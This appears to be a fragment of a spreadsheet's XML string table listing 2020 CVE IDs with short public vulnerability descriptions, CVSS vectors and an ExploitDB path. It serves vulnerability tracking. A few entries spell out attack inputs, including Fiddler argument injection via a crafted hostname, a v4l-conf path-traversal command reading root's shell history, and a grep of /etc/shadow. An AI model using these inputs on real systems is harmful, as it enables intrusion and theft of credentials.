    <t>CVE-2020-1361</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the way that the WalletService handles memory.To exploit the vulnerability, an attacker would first need code execution on a victim system, aka 'Windows WalletService Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13614</t>
  </si>
  <si>
    <t>An issue was discovered in ssl.c in Axel before 2.17.8. The TLS implementation lacks hostname verification.</t>
  </si>
  <si>
    <t>CVE-2020-13615</t>
  </si>
  <si>
    <t>lib/QoreSocket.cpp in Qore before 0.9.4.2 lacks hostname verification for X.509 certificates.</t>
  </si>
  <si>
    <t>CVE-2020-13616</t>
  </si>
  <si>
    <t>The boost ASIO wrapper in net/asio.cpp in Pichi before 1.3.0 lacks TLS hostname verification.</t>
  </si>
  <si>
    <t>CVE-2020-13617</t>
  </si>
  <si>
    <t>The Web UI component of Mitel MiVoice 6800 and 6900 series SIP Phones with firmware before 5.1.0.SP5 could allow an unauthenticated attacker to expose sensitive information due to improper memory handling during failed login attempts.</t>
  </si>
  <si>
    <t>CVE-2020-13619</t>
  </si>
  <si>
    <t>php/exec/escapeshellarg in Locutus PHP through 2.0.11 allows an attacker to achieve code execution.</t>
  </si>
  <si>
    <t>CVE-2020-1362</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1344, CVE-2020-1369.</t>
  </si>
  <si>
    <t>CVE-2020-13620</t>
  </si>
  <si>
    <t>Fastweb FASTGate GPON FGA2130FWB devices through 2020-05-26 allow CSRF via the router administration web panel, leading to an attacker's ability to perform administrative actions such as modifying the configuration.</t>
  </si>
  <si>
    <t>CVE-2020-13622</t>
  </si>
  <si>
    <t>JerryScript 2.2.0 allows attackers to cause a denial of service (assertion failure) because a property key query for a Proxy object returns unintended data.</t>
  </si>
  <si>
    <t>CVE-2020-13623</t>
  </si>
  <si>
    <t>JerryScript 2.2.0 allows attackers to cause a denial of service (stack consumption) via a proxy operation.</t>
  </si>
  <si>
    <t>CVE-2020-13625</t>
  </si>
  <si>
    <t>PHPMailer before 6.1.6 contains an output escaping bug when the name of a file attachment contains a double quote character. This can result in the file type being misinterpreted by the receiver or any mail relay processing the message.</t>
  </si>
  <si>
    <t>CVE-2020-13626</t>
  </si>
  <si>
    <t>OnePlus App Locker through 2020-10-06 allows physically proximate attackers to use Google Assistant to bypass an authorization check in order to send an SMS message when the SMS application is locked.</t>
  </si>
  <si>
    <t>CVE-2020-13627</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the widgetId parameter to service-monitoring/src/index.php. This vulnerability is fixed in versions 1.6.4, 18.10.3, 19.04.3, and 19.0.1 of the Centreon host-monitoring widget; 1.6.4, 18.10.5, 19.04.3, 19.10.2 of the Centreon service-monitoring widget; and 1.0.3, 18.10.1, 19.04.1, 19.10.1 of the Centreon tactical-overview widget.</t>
  </si>
  <si>
    <t>CVE-2020-13628</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the widgetId parameter to host-monitoring/src/toolbar.php. This vulnerability is fixed in versions 1.6.4, 18.10.3, 19.04.3, and 19.0.1 of the Centreon host-monitoring widget; 1.6.4, 18.10.5, 19.04.3, 19.10.2 of the Centreon service-monitoring widget; and 1.0.3, 18.10.1, 19.04.1, 19.10.1 of the Centreon tactical-overview widget.</t>
  </si>
  <si>
    <t>CVE-2020-1363</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Picker Platform improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Picker Platform Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13630</t>
  </si>
  <si>
    <t>ext/fts3/fts3.c in SQLite before 3.32.0 has a use-after-free in fts3EvalNextRow, related to the snippet feature.</t>
  </si>
  <si>
    <t>CVE-2020-13631</t>
  </si>
  <si>
    <t>SQLite before 3.32.0 allows a virtual table to be renamed to the name of one of its shadow tables, related to alter.c and build.c.</t>
  </si>
  <si>
    <t>CVE-2020-13632</t>
  </si>
  <si>
    <t>ext/fts3/fts3_snippet.c in SQLite before 3.32.0 has a NULL pointer dereference via a crafted matchinfo() query.</t>
  </si>
  <si>
    <t>CVE-2020-13633</t>
  </si>
  <si>
    <t>Fork before 5.8.3 allows XSS via navigation_title or title.</t>
  </si>
  <si>
    <t>CVE-2020-13634</t>
  </si>
  <si>
    <t>In Windows Master (aka Windows Optimization Master) 7.99.13.604, the driver file (WoptiHWDetect.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0xF1002558</t>
  </si>
  <si>
    <t>CVE-2020-13637</t>
  </si>
  <si>
    <t>An issue was discovered in the stashcat app through 3.9.2 for macOS, Windows, Android, iOS, and possibly other platforms. It stores the client_key, the device_id, and the public key for end-to-end encryption in cleartext, enabling an attacker (by copying or having access to the local storage database file) to login to the system from any other computer, and get unlimited access to all data in the users's context.</t>
  </si>
  <si>
    <t>CVE-2020-13638</t>
  </si>
  <si>
    <t>lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.</t>
  </si>
  <si>
    <t>CVE-2020-13639</t>
  </si>
  <si>
    <t>A stored XSS vulnerability was discovered in the ECT Provider in OutSystems before 2020-09-04, affecting generated applications. It could allow an unauthenticated remote attacker to craft and store malicious Feedback content into /ECT_Provider/, such that when the content is viewed (it can only be viewed by Administrators), attacker-controlled JavaScript will execute in the security context of an administrator's browser. This is fixed in Outsystems 10.0.1005.2, Outsystems 11.9.0 Platform Server, and Outsystems 11.7.0 LifeTime Management Console.</t>
  </si>
  <si>
    <t>CVE-2020-1364</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in the way that the WalletService handles files, aka 'Windows WalletService Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13640</t>
  </si>
  <si>
    <t>A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request. (No 7.x versions are affected.)</t>
  </si>
  <si>
    <t>CVE-2020-13641</t>
  </si>
  <si>
    <t>An issue was discovered in the Real-Time Find and Replace plugin before 4.0.2 for WordPress. The far_options_page function did not do any nonce verification, allowing for requests to be forged on behalf of an administrator. The find and replace rules could be updated with malicious JavaScript, allowing for that be executed later in the victims browser.</t>
  </si>
  <si>
    <t>CVE-2020-13642</t>
  </si>
  <si>
    <t>An issue was discovered in the SiteOrigin Page Builder plugin before 2.10.16 for WordPress. The action_builder_content function did not do any nonce verification, allowing for requests to be forged on behalf of an administrator. The panels_data $_POST variable allows for malicious JavaScript to be executed in the victim's browser.</t>
  </si>
  <si>
    <t>CVE-2020-13643</t>
  </si>
  <si>
    <t>An issue was discovered in the SiteOrigin Page Builder plugin before 2.10.16 for WordPress. The live editor feature did not do any nonce verification, allowing for requests to be forged on behalf of an administrator. The live_editor_panels_data $_POST variable allows for malicious JavaScript to be executed in the victim's browser.</t>
  </si>
  <si>
    <t>CVE-2020-13644</t>
  </si>
  <si>
    <t>An issue was discovered in the Accordion plugin before 2.2.9 for WordPress. The unprotected AJAX wp_ajax_accordions_ajax_import_json action allowed any authenticated user with Subscriber or higher permissions the ability to import a new accordion and inject malicious JavaScript as part of the accordion.</t>
  </si>
  <si>
    <t>CVE-2020-13645</t>
  </si>
  <si>
    <t>In GNOME glib-networking through 2.64.2, the implementation of GTlsClientConnection skips hostname verification of the server's TLS certificate if the application fails to specify the expected server identity. This is in contrast to its intended documented behavior, to fail the certificate verification. Applications that fail to provide the server identity, including Balsa before 2.5.11 and 2.6.x before 2.6.1, accept a TLS certificate if the certificate is valid for any host.</t>
  </si>
  <si>
    <t>CVE-2020-13646</t>
  </si>
  <si>
    <t>In Cheetah free WiFi 5.1, the driver file (liebaonat.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x830020f8, 0x830020E0, 0x830020E4, or 0x8300210c.</t>
  </si>
  <si>
    <t>CVE-2020-13649</t>
  </si>
  <si>
    <t>parser/js/js-scanner.c in JerryScript 2.2.0 mishandles errors during certain out-of-memory conditions, as demonstrated by a scanner_reverse_info_list NULL pointer dereference and a scanner_scan_all assertion failure.</t>
  </si>
  <si>
    <t>CVE-2020-1365</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Event Logging Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1371.</t>
  </si>
  <si>
    <t>CVE-2020-13650</t>
  </si>
  <si>
    <t>An issue was discovered in DigDash 2018R2 before p20200210 and 2019R1 before p20200210. The login page is vulnerable to Server-Side Request Forgery (SSRF) that allows use of the application as a proxy. Sent to an external server, a forged request discloses application credentials. For a request to an internal component, the request is blind, but through the error message it's possible to determine whether the request targeted a open service.</t>
  </si>
  <si>
    <t>CVE-2020-13651</t>
  </si>
  <si>
    <t>An issue was discovered in DigDash 2018R2 before p20200528, 2019R1 before p20200421, and 2019R2 before p20200430. It allows a user to provide data that will be used to generate the JNLP file used by a client to obtain the right Java application. By providing an attacker-controlled URL, the client will obtain a rogue JNLP file specifying the installation of malicious JAR archives and executed with full privileges on the client computer.</t>
  </si>
  <si>
    <t>CVE-2020-13652</t>
  </si>
  <si>
    <t>An issue was discovered in DigDash 2018R2 before p20200528, 2019R1 before p20200528, 2019R2 before p20200430, and 2020R1 before p20200507. A cross-site scripting (XSS) vulnerability exists in the login menu.</t>
  </si>
  <si>
    <t>CVE-2020-13653</t>
  </si>
  <si>
    <t>An XSS vulnerability exists in the Webmail component of Zimbra Collaboration Suite before 8.8.15 Patch 11. It allows an attacker to inject executable JavaScript into the account name of a user's profile. The injected code can be reflected and executed when changing an e-mail signature.</t>
  </si>
  <si>
    <t>CVE-2020-13654</t>
  </si>
  <si>
    <t>XWiki Platform before 12.8 mishandles escaping in the property displayer.</t>
  </si>
  <si>
    <t>CVE-2020-13655</t>
  </si>
  <si>
    <t>An issue was discovered in Collabtive 3.0 and later. managefile.php is vulnerable to XSS: when the action parameter is set to movefile and the id parameter corresponds to a project the current user has access to, the file and target parameters are reflected.</t>
  </si>
  <si>
    <t>CVE-2020-13656</t>
  </si>
  <si>
    <t>In Morgan Stanley Hobbes through 2020-05-21, the array implementation lacks bounds checking, allowing exploitation of an out-of-bounds (OOB) read/write vulnerability that leads to both local and remote code (via RPC) execution.</t>
  </si>
  <si>
    <t>CVE-2020-13657</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Avast Free Antivirus and AVG AntiVirus Free before 20.4 due to improperly handling hard links. The vulnerability allows local users to take control of arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-13658</t>
  </si>
  <si>
    <t>In Lansweeper 8.0.130.17, the web console is vulnerable to a CSRF attack that would allow a low-level Lansweeper user to elevate their privileges within the application.</t>
  </si>
  <si>
    <t>CVE-2020-13659</t>
  </si>
  <si>
    <t>address_space_map in exec.c in QEMU 4.2.0 can trigger a NULL pointer dereference related to BounceBuffer.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-1366</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Print Workflow Service improperly handles objects in memory, aka 'Windows Print Workflow Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13660</t>
  </si>
  <si>
    <t>CMS Made Simple through 2.2.14 allows XSS via a crafted File Picker profile name.</t>
  </si>
  <si>
    <t>CVE-2020-13661</t>
  </si>
  <si>
    <t>Telerik Fiddler through 5.0.20202.18177 allows attackers to execute arbitrary programs via a hostname with a trailing space character, followed by --utility-and-browser --utility-cmd-prefix= and the pathname of a locally installed program. The victim must interactively choose the Open On Browser option. Fixed in version 5.0.20204.</t>
  </si>
  <si>
    <t>CVE-2020-13662</t>
  </si>
  <si>
    <t>Open Redirect vulnerability in Drupal Core allows a user to be tricked into visiting a specially crafted link which would redirect them to an arbitrary external URL. This issue affects: Drupal Drupal Core 7 version 7.70 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-13663</t>
  </si>
  <si>
    <t>Cross Site Request Forgery vulnerability in Drupal Core Form API does not properly handle certain form input from cross-site requests, which can lead to other vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-13664</t>
  </si>
  <si>
    <t>Arbitrary PHP code execution vulnerability in Drupal Core under certain circumstances. An attacker could trick an administrator into visiting a malicious site that could result in creating a carefully named directory on the file system. With this directory in place, an attacker could attempt to brute force a remote code execution vulnerability. Windows servers are most likely to be affected. This issue affects: Drupal Drupal Core 8.8.x versions prior to 8.8.8; 8.9.x versions prior to 8.9.1; 9.0.1 versions prior to 9.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-13665</t>
  </si>
  <si>
    <t>Access bypass vulnerability in Drupal Core allows JSON:API when JSON:API is in read/write mode. Only sites that have the read_only set to FALSE under jsonapi.settings config are vulnerable. This issue affects: Drupal Drupal Core 8.8.x versions prior to 8.8.8; 8.9.x versions prior to 8.9.1; 9.0.x versions prior to 9.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-13666</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Drupal Core. Drupal AJAX API does not disable JSONP by default, allowing for an XSS attack. This issue affects: Drupal Drupal Core 7.x versions prior to 7.73; 8.8.x versions prior to 8.8.10; 8.9.x versions prior to 8.9.6; 9.0.x versions prior to 9.0.6.</t>
  </si>
  <si>
    <t>CVE-2020-13667</t>
  </si>
  <si>
    <t>Access bypass vulnerability in of Drupal Core Workspaces allows an attacker to access data without correct permissions. The Workspaces module doesn't sufficiently check access permissions when switching workspaces, leading to an access bypass vulnerability. An attacker might be able to see content before the site owner intends people to see the content. This vulnerability is mitigated by the fact that sites are only vulnerable if they have installed the experimental Workspaces module. This issue affects Drupal Core8.8.X versions prior to 8.8.10; 8.9.X versions prior to 8.9.6; 9.0.X versions prior to 9.0.6.</t>
  </si>
  <si>
    <t>CVE-2020-13668</t>
  </si>
  <si>
    <t>Access Bypass vulnerability in Drupal Core allows for an attacker to leverage the way that HTML is rendered for affected forms in order to exploit the vulnerability. This issue affects: Drupal Core 8.8.x versions prior to 8.8.10; 8.9.x versions prior to 8.9.6; 9.0.x versions prior to 9.0.6.</t>
  </si>
  <si>
    <t>CVE-2020-13669</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) vulnerability in ckeditor of Drupal Core allows attacker to inject XSS. This issue affects: Drupal Core 8.8.x versions prior to 8.8.10.; 8.9.x versions prior to 8.9.6; 9.0.x versions prior to 9.0.6.</t>
  </si>
  <si>
    <t>CVE-2020-1367</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1389, CVE-2020-1419, CVE-2020-1426.</t>
  </si>
  <si>
    <t>CVE-2020-13670</t>
  </si>
  <si>
    <t>Information Disclosure vulnerability in file module of Drupal Core allows an attacker to gain access to the file metadata of a permanent private file that they do not have access to by guessing the ID of the file. This issue affects: Drupal Core 8.8.x versions prior to 8.8.10; 8.9.x versions prior to 8.9.6; 9.0.x versions prior to 9.0.6.</t>
  </si>
  <si>
    <t>CVE-2020-13671</t>
  </si>
  <si>
    <t>Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.</t>
  </si>
  <si>
    <t>CVE-2020-13672</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) vulnerability in Drupal core's sanitization API fails to properly filter cross-site scripting under certain circumstances. This issue affects: Drupal Core 9.1.x versions prior to 9.1.7; 9.0.x versions prior to 9.0.12; 8.9.x versions prior to 8.9.14; 7.x versions prior to 7.80.</t>
  </si>
  <si>
    <t>CVE-2020-13673</t>
  </si>
  <si>
    <t>The Entity Embed module provides a filter to allow embedding entities in content fields. In certain circumstances, the filter could allow an unprivileged user to inject HTML into a page when it is accessed by a trusted user with permission to embed entities. In some cases, this could lead to cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-13674</t>
  </si>
  <si>
    <t>The QuickEdit module does not properly validate access to routes, which could allow cross-site request forgery under some circumstances and lead to possible data integrity issues. Sites are only affected if the QuickEdit module (which comes with the Standard profile) is installed. Removing the "access in-place editing" permission from untrusted users will not fully mitigate the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-13675</t>
  </si>
  <si>
    <t>Drupal's JSON:API and REST/File modules allow file uploads through their HTTP APIs. The modules do not correctly run all file validation, which causes an access bypass vulnerability. An attacker might be able to upload files that bypass the file validation process implemented by modules on the site.</t>
  </si>
  <si>
    <t>CVE-2020-13676</t>
  </si>
  <si>
    <t>The QuickEdit module does not properly check access to fields in some circumstances, which can lead to unintended disclosure of field data. Sites are only affected if the QuickEdit module (which comes with the Standard profile) is installed.</t>
  </si>
  <si>
    <t>CVE-2020-13677</t>
  </si>
  <si>
    <t>Under some circumstances, the Drupal core JSON:API module does not properly restrict access to certain content, which may result in unintended access bypass. Sites that do not have the JSON:API module enabled are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-1368</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Credential Enrollment Manager service handles objects in memory, aka 'Windows Credential Enrollment Manager Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-13688</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in l Drupal Core allows an attacker could leverage the way that HTML is rendered for affected forms in order to exploit the vulnerability. This issue affects: Drupal Core 8.8.X versions prior to 8.8.10; 8.9.X versions prior to 8.9.6; 9.0.X versions prior to 9.0.6.</t>
  </si>
  <si>
    <t>CVE-2020-1369</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1344, CVE-2020-1362.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48534.py</t>
  </si>
  <si>
    <t>WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation</t>
  </si>
  <si>
    <t>CVE-2020-13692</t>
  </si>
  <si>
    <t>PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H</t>
  </si>
  <si>
    <t>CVE-2020-13693</t>
  </si>
  <si>
    <t>An unauthenticated privilege-escalation issue exists in the bbPress plugin before 2.6.5 for WordPress when New User Registration is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-13694</t>
  </si>
  <si>
    <t>In QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8, the local www-data user can execute sudo mysql without a password, which means that the www-data user can execute arbitrary OS commands via the mysql -e option.</t>
  </si>
  <si>
    <t>CVE-2020-13695</t>
  </si>
  <si>
    <t>In QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8, the local www-data user has sudo privileges to execute grep as root without a password, which allows an attacker to obtain sensitive information via a grep of a /root/*.db or /etc/shadow file.</t>
  </si>
  <si>
    <t>CVE-2020-13696</t>
  </si>
  <si>
    <t>An issue was discovered in LinuxTV xawtv before 3.107. The function dev_open() in v4l-conf.c does not perform sufficient checks to prevent an unprivileged caller of the program from opening unintended filesystem paths. This allows a local attacker with access to the v4l-conf setuid-root program to test for the existence of arbitrary files and to trigger an open on arbitrary files with mode O_RDWR. To achieve this, relative path components need to be added to the device path, as demonstrated by a v4l-conf -c /dev/../root/.bash_history command.</t>
  </si>
  <si>
    <t>CVE-2020-13697</t>
  </si>
  <si>
    <t>An issue was discovered in RouterNanoHTTPD.java in NanoHTTPD through 2.3.1. The GeneralHandler class implements a basic GET handler that prints debug information as an HTML page. Any web server that extends this class without implementing its own GET handler is vulnerable to reflected XSS, because the GeneralHandler GET handler prints user input passed through the query string without any sanitization.</t>
  </si>
  <si>
    <t>CVE-2020-13699</t>
  </si>
  <si>
    <t>TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.</t>
  </si>
  <si>
    <t>CVE-2020-1370</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1353, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413, CVE-2020-1414, CVE-2020-1415, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-13700</t>
  </si>
  <si>
    <t>An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress. It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.</t>
  </si>
  <si>
    <t>CVE-2020-13702</t>
  </si>
  <si>
    <t>The Rolling Proximity Identifier used in the Apple/Google Exposure Notification API beta through 2020-05-29 enables attackers to circumvent Bluetooth Smart Privacy because there is a secondary temporary UID. An attacker with access to Beacon or IoT networks can seamlessly track individual device movement via a Bluetooth LE discovery mechanism.</t>
  </si>
  <si>
    <t>CVE-2020-1371</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Event Logging Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Event Logging Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1365.</t>
  </si>
  <si>
    <t>CVE-2020-1372</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles objects in memory, aka 'Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1405.</t>
  </si>
  <si>
    <t>CVE-2020-1373</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka 'Windows Network Connections Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1390, CVE-2020-1427, CVE-2020-1428, CVE-2020-1438.</t>
  </si>
  <si>
    <t>CVE-2020-1374</t>
  </si>
  <si>
    <t>CVE-2020-1375</t>
  </si>
  <si>
    <t>CVE-2020-13753</t>
  </si>
  <si>
    <t>The bubblewrap sandbox of WebKitGTK and WPE WebKit, prior to 2.28.3, failed to properly block access to CLONE_NEWUSER and the TIOCSTI ioctl. CLONE_NEWUSER could potentially be used to confuse xdg-desktop-portal, which allows access outside the sandbox. TIOCSTI can be used to directly execute commands outside the sandbox by writing to the controlling terminal's input buffer, similar to CVE-2017-5226.</t>
  </si>
  <si>
    <t>CVE-2020-13754</t>
  </si>
  <si>
    <t>hw/pci/msix.c in QEMU 4.2.0 allows guest OS users to trigger an out-of-bounds access via a crafted address in an msi-x mmio operation.</t>
  </si>
  <si>
    <t>CVE-2020-13756</t>
  </si>
  <si>
    <t>Sabberworm PHP CSS Parser before 8.3.1 calls eval on uncontrolled data, possibly leading to remote code execution if the function allSelectors() or getSelectorsBySpecificity() is called with input from an attacker.</t>
  </si>
  <si>
    <t>CVE-2020-13757</t>
  </si>
  <si>
    <t>Python-RSA before 4.1 ignores leading '\0' bytes during decryption of ciphertext. This could conceivably have a security-relevant impact, e.g., by helping an attacker to infer that an application uses Python-RSA, or if the length of accepted ciphertext affects application behavior (such as by causing excessive memory allocation).</t>
  </si>
  <si>
    <t>CVE-2020-13758</t>
  </si>
  <si>
    <t>modules/security/classes/general.post_filter.php/post_filter.php in the Web Application Firewall in Bitrix24 through 20.0.950 allows XSS by placing %00 before the payload.</t>
  </si>
  <si>
    <t>CVE-2020-13759</t>
  </si>
  <si>
    <t>rust-vmm vm-memory before 0.1.1 and 0.2.x before 0.2.1 allows attackers to cause a denial of service (loss of IP networking) because read_obj and write_obj do not properly access memory. This affects aarch64 (with musl or glibc) and x86_64 (with musl).</t>
  </si>
  <si>
    <t>CVE-2020-1376</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that fdSSDP.dll handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1052, CVE-2020-1159.</t>
  </si>
  <si>
    <t>CVE-2020-13760</t>
  </si>
  <si>
    <t>In Joomla! before 3.9.19, missing token checks in com_postinstall lead to CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-13761</t>
  </si>
  <si>
    <t>In Joomla! before 3.9.19, lack of input validation in the heading tag option of the "Articles - Newsflash" and "Articles - Categories" modules allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-13762</t>
  </si>
  <si>
    <t>In Joomla! before 3.9.19, incorrect input validation of the module tag option in com_modules allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-13763</t>
  </si>
  <si>
    <t>In Joomla! before 3.9.19, the default settings of the global textfilter configuration do not block HTML inputs for Guest users.</t>
  </si>
  <si>
    <t>CVE-2020-13764</t>
  </si>
  <si>
    <t>common.php in the Gravity Forms plugin before 2.4.9 for WordPress can leak hashed passwords because user_pass is not considered a special case for a $current_user-&gt;get($property) call.</t>
  </si>
  <si>
    <t>CVE-2020-13765</t>
  </si>
  <si>
    <t>rom_copy() in hw/core/loader.c in QEMU 4.0 and 4.1.0 does not validate the relationship between two addresses, which allows attackers to trigger an invalid memory copy operation.</t>
  </si>
  <si>
    <t>CVE-2020-13767</t>
  </si>
  <si>
    <t>The Mitel MiCollab application before 9.1.332 for iOS could allow an unauthorized user to access restricted files and folders due to insufficient access control. An exploit requires a rooted iOS device, and (if successful) could allow an attacker to gain access to sensitive information,</t>
  </si>
  <si>
    <t>CVE-2020-13768</t>
  </si>
  <si>
    <t>In MiniShare before 1.4.2, there is a stack-based buffer overflow via an HTTP PUT request, which allows an attacker to achieve arbitrary code execution, a similar issue to CVE-2018-19861, CVE-2018-19862, and CVE-2019-17601. NOTE: this product is discontinued.</t>
  </si>
  <si>
    <t>CVE-2020-13769</t>
  </si>
  <si>
    <t>LDMS/alert_log.aspx in Ivanti Endpoint Manager through 2020.1 allows SQL Injection via a /remotecontrolauth/api/device request.</t>
  </si>
  <si>
    <t>CVE-2020-1377</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory, aka 'Windows Registry Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1378.</t>
  </si>
  <si>
    <t>CVE-2020-13770</t>
  </si>
  <si>
    <t>Several services are accessing named pipes in Ivanti Endpoint Manager through 2020.1.1 with default or overly permissive security attributes; as these services run as user ‘NT AUTHORITY\SYSTEM’, the issue can be used to escalate privileges from a local standard or service account having SeImpersonatePrivilege (eg. user ‘NT AUTHORITY\NETWORK SERVICE’).</t>
  </si>
  <si>
    <t>CVE-2020-13771</t>
  </si>
  <si>
    <t>Various components in Ivanti Endpoint Manager through 2020.1.1 rely on Windows search order when loading a (nonexistent) library file, allowing (under certain conditions) one to gain code execution (and elevation of privileges to the level of privilege held by the vulnerable component such as NT AUTHORITY\SYSTEM) via DLL hijacking. This affects ldiscn32.exe, IpmiRedirectionService.exe, LDAPWhoAmI.exe, and ldprofile.exe.</t>
  </si>
  <si>
    <t>CVE-2020-13772</t>
  </si>
  <si>
    <t>In /ldclient/ldprov.cgi in Ivanti Endpoint Manager through 2020.1.1, an attacker is able to disclose information about the server operating system, local pathnames, and environment variables with no authentication required.</t>
  </si>
  <si>
    <t>CVE-2020-13773</t>
  </si>
  <si>
    <t>Ivanti Endpoint Manager through 2020.1.1 allows XSS via /LDMS/frm_splitfrm.aspx, /LDMS/licensecheck.aspx, /LDMS/frm_splitcollapse.aspx, /LDMS/alert_log.aspx, /LDMS/ServerList.aspx, /LDMS/frm_coremainfrm.aspx, /LDMS/frm_findfrm.aspx, /LDMS/frm_taskfrm.aspx, and /LDMS/query_browsecomp.aspx.</t>
  </si>
  <si>
    <t>CVE-2020-13774</t>
  </si>
  <si>
    <t>An unrestricted file-upload issue in EditLaunchPadDialog.aspx in Ivanti Endpoint Manager 2019.1 and 2020.1 allows an authenticated attacker to gain remote code execution by uploading a malicious aspx file. The issue is caused by insufficient file extension validation and insecure file operations on the uploaded image, which upon failure will leave the temporarily created files in an accessible location on the server.</t>
  </si>
  <si>
    <t>CVE-2020-13775</t>
  </si>
  <si>
    <t>ZNC 1.8.0 up to 1.8.1-rc1 allows authenticated users to trigger an application crash (with a NULL pointer dereference) if echo-message is not enabled and there is no network.</t>
  </si>
  <si>
    <t>CVE-2020-13776</t>
  </si>
  <si>
